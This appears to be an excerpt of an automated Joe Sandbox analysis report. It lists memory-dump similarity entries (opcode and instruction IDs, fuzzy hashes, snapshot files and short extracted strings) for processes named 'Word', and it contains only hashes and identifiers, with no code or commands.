                                                                  • Opcode ID: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction ID: 84dc39e15fa4c5ceabd0d4c7761664e5b71e4d181e851cd8d9663ce5c3be1cb0
                                                                  • Opcode Fuzzy Hash: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction Fuzzy Hash: F231F652B19A194FF784B7BC981EBBDBAD1EF99310F14417AE00DC3292DD289C418781
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction ID: 2fecf18e6b7eef6d6c583994f4b81d2a32ba8c64a8fa9fcb0cca17f9ba4abb60
                                                                  • Opcode Fuzzy Hash: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction Fuzzy Hash: 7B41F76798C6664BE241BBBCF4798FA7BD0DF412397088177D18DC96A3EC1474898BC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a44c55d339a5f5e3f436afe7690adc4e3ccc7f162c4c582951527ca3c5c68197
                                                                  • Instruction ID: f38fdde7229c4dfe4fffd27e6f4e1a79d09a820eb272cd7e8520a5130dfc4030
                                                                  • Opcode Fuzzy Hash: a44c55d339a5f5e3f436afe7690adc4e3ccc7f162c4c582951527ca3c5c68197
                                                                  • Instruction Fuzzy Hash: 0E21076284E7954FF342A7BCD8798E97FB0EF43214B0881B7C08DCA1A3EC1864498795
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1430bb415565e453a2d6a66af0fb482a4f58f97b0d7ecc1fd638ba5554c69572
                                                                  • Instruction ID: 5208f2faaa6656c9e06c293163ed62129da52050e51ae010e88859e87d941229
                                                                  • Opcode Fuzzy Hash: 1430bb415565e453a2d6a66af0fb482a4f58f97b0d7ecc1fd638ba5554c69572
                                                                  • Instruction Fuzzy Hash: 64A159677886268FE701BB7CF859AF97FA0EF81375B048477C14ACB283C924648687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5dd2b5055b6c48213df05093b0e6b0c826cf6fa74e0a5bb100d49c011134507c
                                                                  • Instruction ID: d707e4175959d2e39d2e2ac70f6ea40119a9d77fe05266f95766bf4d3fde4b58
                                                                  • Opcode Fuzzy Hash: 5dd2b5055b6c48213df05093b0e6b0c826cf6fa74e0a5bb100d49c011134507c
                                                                  • Instruction Fuzzy Hash: C5912B67B889268BE700BB7CF819AF97B90EF85375B048577C14ECA293C924648687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ed3d27f851827abb7e7ae34e7a2287f6870421b65fcc2d8388e0c596c5ae62d
                                                                  • Instruction ID: d308bea8f715c18f7f4aeb7d8d449a42d3c41e02db78ab366a4bfc60fee7e8c5
                                                                  • Opcode Fuzzy Hash: 9ed3d27f851827abb7e7ae34e7a2287f6870421b65fcc2d8388e0c596c5ae62d
                                                                  • Instruction Fuzzy Hash: FF813966B889268BE700BB7CF819AF97FA0EF85375B048577C14EC6293C924748687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ee8c824a330591dddf6eb04331d2113140a27761f1a79e6ebf358d682b8fd91
                                                                  • Instruction ID: b7874cceb08d408b04f294dc83f456ff2926ac2461944613be704a7e689cc90a
                                                                  • Opcode Fuzzy Hash: 0ee8c824a330591dddf6eb04331d2113140a27761f1a79e6ebf358d682b8fd91
                                                                  • Instruction Fuzzy Hash: 5F813966B889268BE700BB7CF819AF97BA0EF85375B048577C14EC7293C924748687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92902c35b6f0905f0a86dcfa2286d904a544ca49aa2cb489c417eaafee34c7e2
                                                                  • Instruction ID: 708d56ebeb7fcfcdfac1751cf54ff5079bc0f82baf7b20d9a870df1917600d46
                                                                  • Opcode Fuzzy Hash: 92902c35b6f0905f0a86dcfa2286d904a544ca49aa2cb489c417eaafee34c7e2
                                                                  • Instruction Fuzzy Hash: 04715A66B889268FE700BB7CE819AF97FA0EF85365B148576C14EC7293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a58965a75ba0faa2e05981ebc5b892ead78218330c0da1f1e0bd17359698f1f
                                                                  • Instruction ID: 155affe9d9c57dd5d16a92142f128008dfcfd0083f1860a685b724c1f8e48e70
                                                                  • Opcode Fuzzy Hash: 9a58965a75ba0faa2e05981ebc5b892ead78218330c0da1f1e0bd17359698f1f
                                                                  • Instruction Fuzzy Hash: 27515CA2A8E6858FF305E77CD8A99F97FA0EF4120475484B6D08BC7397EC2C944987C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1c17d4b4f3539e52ea7827877029a0cebaf57416c9d6e9daf28863d69283d2f
                                                                  • Instruction ID: 6aea1be9007eb8af9afaed8c1075aaba4d11896ce9384584e4cf796bb13d8d31
                                                                  • Opcode Fuzzy Hash: c1c17d4b4f3539e52ea7827877029a0cebaf57416c9d6e9daf28863d69283d2f
                                                                  • Instruction Fuzzy Hash: C541D5B1A19A1A8FFB44EB78C859AFD7FA1FF89301F544475D00AD3293DD28A8458790
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5afe6e43d7d8107420c033bc76bfd5751a88aa77871c32d69a40726901ce2b69
                                                                  • Instruction ID: 9bd3451ddc103d59e945b5bb9b50141fb35a20f95884c9822d5e1d85a676975d
                                                                  • Opcode Fuzzy Hash: 5afe6e43d7d8107420c033bc76bfd5751a88aa77871c32d69a40726901ce2b69
                                                                  • Instruction Fuzzy Hash: 2B21F7A198C6499FF755EB38C4A9CB93F71EF89300B9084E5D40BC3397ED2CA8008781
                                                                  Memory Dump Source
                                                                  • Source File: 00000017.00000002.1999446035.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_23_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba37084570fc292fc6a4a632fe202cced0819595910c2ba64b51547a273a6b7c
                                                                  • Instruction ID: 7bb1cfe3855784190bb96d3a254ab2db8a4d7f75b1eaa2f19785ea4e60a3bb64
                                                                  • Opcode Fuzzy Hash: ba37084570fc292fc6a4a632fe202cced0819595910c2ba64b51547a273a6b7c
                                                                  • Instruction Fuzzy Hash: E001496490DB918FF795A73858595717FE0DB92345B0804AAE88DC65D7EC08DA8883C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: cefffe24207aa1ea5ebb01bf3d82970ac78cf5839abe3021b78f6fcb0878a416
                                                                  • Instruction ID: 28910e83792fa9571596f33601cc8f811eb02724d847aa1df4fb7ab4977028c1
                                                                  • Opcode Fuzzy Hash: cefffe24207aa1ea5ebb01bf3d82970ac78cf5839abe3021b78f6fcb0878a416
                                                                  • Instruction Fuzzy Hash: D03216A1B29A558FF794EB3CC459ABDB7D2FF99344F404579D00EC3292DE28AC418781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: cfb8d7741fc3c77b0a4948e8b95753d04dfcd25b01208ac033b3ed547b245c39
                                                                  • Instruction ID: b62b63c6c7357018478cd603c63ee653c1d17929302b0cb7f8f44dfa909e7aa0
                                                                  • Opcode Fuzzy Hash: cfb8d7741fc3c77b0a4948e8b95753d04dfcd25b01208ac033b3ed547b245c39
                                                                  • Instruction Fuzzy Hash: 5C22F5A1A19A598FF798EB38C45DABD7BD2EF99344F404479E00EC32D3DD28AC458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 8dbfca5bb1d1d55cc3789747db2e811f4825faba3460782e331a2eb047b9d60b
                                                                  • Instruction ID: 764b28a9c669dd017f1baf66ae944ae8d06de1cb4cebd5ddb2bf79c7196c81d3
                                                                  • Opcode Fuzzy Hash: 8dbfca5bb1d1d55cc3789747db2e811f4825faba3460782e331a2eb047b9d60b
                                                                  • Instruction Fuzzy Hash: 1151435161E6C58FE396A77898686757FE5EF87229B0804FBE0CDC71A3DD08480AC382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9N_^
                                                                  • API String ID: 0-1737749909
                                                                  • Opcode ID: 75be411384e9f22dfe2c380058ebd365905bb9ba6dd385b6648314ef5a46b14c
                                                                  • Instruction ID: 344eb79d5f03ba25f6c46808e9af7185c8b8e2e9127ead32d31f85f1481c5482
                                                                  • Opcode Fuzzy Hash: 75be411384e9f22dfe2c380058ebd365905bb9ba6dd385b6648314ef5a46b14c
                                                                  • Instruction Fuzzy Hash: 80614A62A895268FE741BBBCE4199FD7BE0EF85325B148536C10EC7393CD24B48687D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4N_^
                                                                  • API String ID: 0-2516135240
                                                                  • Opcode ID: e96802fb552b652fc7b9f296b388f489a50564e93492b2c6dc427110a38bbdc7
                                                                  • Instruction ID: d184b38bbcd6f7bda36d53566f2f977935e9a26f6a364b1d7ab388fb95f0e864
                                                                  • Opcode Fuzzy Hash: e96802fb552b652fc7b9f296b388f489a50564e93492b2c6dc427110a38bbdc7
                                                                  • Instruction Fuzzy Hash: 79511961A4E6960FE396A73CD8596B97FD5DF87220B0940FBD08DC72A3DC189C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^
                                                                  • API String ID: 0-1347224999
                                                                  • Opcode ID: 372f873ffe8dc1c53a7b69f43dc91b6f4f26dcb7a13134a5a582eb64a581f139
                                                                  • Instruction ID: b8728b60eae765c59791a5f0cf5e7e4914ad17281b13275265a0dc10294c5831
                                                                  • Opcode Fuzzy Hash: 372f873ffe8dc1c53a7b69f43dc91b6f4f26dcb7a13134a5a582eb64a581f139
                                                                  • Instruction Fuzzy Hash: 5E418C72ACE6594FE302EB7CE8A5DE93FA0EF85245744C4B6C04BCB3A7DD2864458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 87bc693455aba0d1752cc3d06fdc04f7f2b4fa1870699b2fb0d37484e74449e5
                                                                  • Instruction ID: 9b41a84d70207cb17ad5a386e06c3a5f31156b0831114ffbdcbfd163f2dde902
                                                                  • Opcode Fuzzy Hash: 87bc693455aba0d1752cc3d06fdc04f7f2b4fa1870699b2fb0d37484e74449e5
                                                                  • Instruction Fuzzy Hash: 3131F561B1C9584FE798EB7CD85AB78B6C6EB99315F0405BEE04EC32A3DD249C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction ID: 84dc39e15fa4c5ceabd0d4c7761664e5b71e4d181e851cd8d9663ce5c3be1cb0
                                                                  • Opcode Fuzzy Hash: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction Fuzzy Hash: F231F652B19A194FF784B7BC981EBBDBAD1EF99310F14417AE00DC3292DD289C418781
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction ID: 2fecf18e6b7eef6d6c583994f4b81d2a32ba8c64a8fa9fcb0cca17f9ba4abb60
                                                                  • Opcode Fuzzy Hash: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction Fuzzy Hash: 7B41F76798C6664BE241BBBCF4798FA7BD0DF412397088177D18DC96A3EC1474898BC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e1856c93c073c6d3d6eb9e8b7abdd8facf299c102d8f2b76ea674fdad81bf07
                                                                  • Instruction ID: bfc76739adba00fd9be0bd542387526899c58d1463bf57da8f8dc1cdfd6f095f
                                                                  • Opcode Fuzzy Hash: 1e1856c93c073c6d3d6eb9e8b7abdd8facf299c102d8f2b76ea674fdad81bf07
                                                                  • Instruction Fuzzy Hash: 5721076284E7954FF342A7BCD8798E97FB0EF43214B0881B7C08DCA1A3EC1864498795
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30ae8e5733f6d66b0f0e78f53df26b572fc2c04a0d6b88778cefdb2ab5b0f908
                                                                  • Instruction ID: 86a3ad2463e39225a2b0d816332ea3279aa66a14989ec1a99e61379f4a26917c
                                                                  • Opcode Fuzzy Hash: 30ae8e5733f6d66b0f0e78f53df26b572fc2c04a0d6b88778cefdb2ab5b0f908
                                                                  • Instruction Fuzzy Hash: 60A15967788A268FD701BB7CF855AED7BA0EF85375B048477C14ACB293C924648A87D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f10a00124c83f8ae4aae4e30eac308266449982fad3dc6b52ec41694e97bdce
                                                                  • Instruction ID: 03ae53a8395df79144e27bc9fb9da5114b2f2bdce25637c58250e9cc34ce9c5b
                                                                  • Opcode Fuzzy Hash: 7f10a00124c83f8ae4aae4e30eac308266449982fad3dc6b52ec41694e97bdce
                                                                  • Instruction Fuzzy Hash: 4B913967B889268BD700BB7CF819AED7B90EF85375B048577C24ECB293C924748687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc3bab2d76e912cd4fec3d3d348673031d44728b425485ea9b03d432b5d73bb9
                                                                  • Instruction ID: d3be75be1905879eb1cdb05ea4f2e4936abddbfc6a7ac3cd8eacc03857371c31
                                                                  • Opcode Fuzzy Hash: cc3bab2d76e912cd4fec3d3d348673031d44728b425485ea9b03d432b5d73bb9
                                                                  • Instruction Fuzzy Hash: 33813866B889268BE700BB7CF819AED7BA0EF85375B048577C14EC7293C924748687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3c620bcf4ec17a8f351e37a65c9fac898863dc8cfe6b2027d08a1374ece2641
                                                                  • Instruction ID: dfc9a624791be9c0d05b54201f640721464628c2320fb148c56fcf62bc503b85
                                                                  • Opcode Fuzzy Hash: d3c620bcf4ec17a8f351e37a65c9fac898863dc8cfe6b2027d08a1374ece2641
                                                                  • Instruction Fuzzy Hash: AA813866B889268BE700BB7CF819AED7BA0EF85375B048577C14EC7293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 794c750dd040d6b1abb8a45778f340d6d6d5d58979d8cb5e92f94df3d88de3e6
                                                                  • Instruction ID: c838e0282046d5a8b8dfa240b9983e39211cc2957afd699c148b0064e9599542
                                                                  • Opcode Fuzzy Hash: 794c750dd040d6b1abb8a45778f340d6d6d5d58979d8cb5e92f94df3d88de3e6
                                                                  • Instruction Fuzzy Hash: F0715766B889268BE700BB7CE819AED7FA0EF85365B148576C14EC7293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75bcfd527e0bf0664f0fafe1a1f72e95a7a2f8130c35b3d88c6584c7f304b0ca
                                                                  • Instruction ID: 50a3d0665196b7bbfc62ae486a62b4c7d472abf309d56d2fd5300e770a4f0c27
                                                                  • Opcode Fuzzy Hash: 75bcfd527e0bf0664f0fafe1a1f72e95a7a2f8130c35b3d88c6584c7f304b0ca
                                                                  • Instruction Fuzzy Hash: A05190A2A8E7854FE301EB7CD8B59E97FA0EF45204754C4B6D08ACB3D7EC28644987C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 680280710537e820ce9bee63285d86646056c701e3462a20aee971620ecfac37
                                                                  • Instruction ID: 45722488ce7570f5fbc4f21ee40acb88759bd0d9434675b720ee2d3b75ddd011
                                                                  • Opcode Fuzzy Hash: 680280710537e820ce9bee63285d86646056c701e3462a20aee971620ecfac37
                                                                  • Instruction Fuzzy Hash: 4B41C371A19A1A8FEB44EBB8C859AED7BA1FF89301F544475D00AD3393DD38A8458790
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a568d8bbe09d6ab6660d481f4ffed25c54bbf7944b5f594f26a14f241e0c19ad
                                                                  • Instruction ID: 737ebc06797eb63c98d58994365e4c19267ab876d1e54a26e1774e78195af51c
                                                                  • Opcode Fuzzy Hash: a568d8bbe09d6ab6660d481f4ffed25c54bbf7944b5f594f26a14f241e0c19ad
                                                                  • Instruction Fuzzy Hash: 602106A068E6495FE341EB78C4A5DEE3FB1EF89241B9084A5D40BC33A7ED2869008781
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0951597459297e740e48e4e14c4da725aea831d9b49bab5e09b9da241db3c112
                                                                  • Instruction ID: 9904c383b91152d5fc96e45b268eeed9fc4aa1aaa7b135498d3d8235b3c9921b
                                                                  • Opcode Fuzzy Hash: 0951597459297e740e48e4e14c4da725aea831d9b49bab5e09b9da241db3c112
                                                                  • Instruction Fuzzy Hash: 4501996090DB918FF795A73858594713FE0CB92344B0804AAE88CC64D7EC08EA8883C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: 76601a2ef25899e93a8f271add9001992249d32aa997b0f49b916c48c1f49b1c
                                                                  • Instruction ID: b687f1f0a6926487f7227e477abcbfa95aaae9ebf978dd16d1413b5e90b8d943
                                                                  • Opcode Fuzzy Hash: 76601a2ef25899e93a8f271add9001992249d32aa997b0f49b916c48c1f49b1c
                                                                  • Instruction Fuzzy Hash: D7320560B29A558FF794EB3CC459A79B7D2FF99304F5085B9E00EC3296DE28EC418781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: ba20c6a6f12334d544095a447427200a5e349b2857556a4c0af7b13788713e4e
                                                                  • Instruction ID: 3217cb8ab53920d3e96423987260f6664f089d7cf7af2a66dfc68b5c4d04850c
                                                                  • Opcode Fuzzy Hash: ba20c6a6f12334d544095a447427200a5e349b2857556a4c0af7b13788713e4e
                                                                  • Instruction Fuzzy Hash: 4E22E461A29A598FF798E738C45DAB97BD2EF99304F4044B9E00EC32D6DD28EC458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 777b330c669fe68b683dedc64fc489a9676f27b901c59548e001b2fce876cae5
                                                                  • Instruction ID: 8e1e9082fff247472c58f62aeb50ddfde0b032ecca8ed5d2f80e7a6c9469b72b
                                                                  • Opcode Fuzzy Hash: 777b330c669fe68b683dedc64fc489a9676f27b901c59548e001b2fce876cae5
                                                                  • Instruction Fuzzy Hash: D951445161E6C58FE396A77898686757FE5EF87229B0804FBE0CDC71A3DD08480AC382
                                                                  Strings
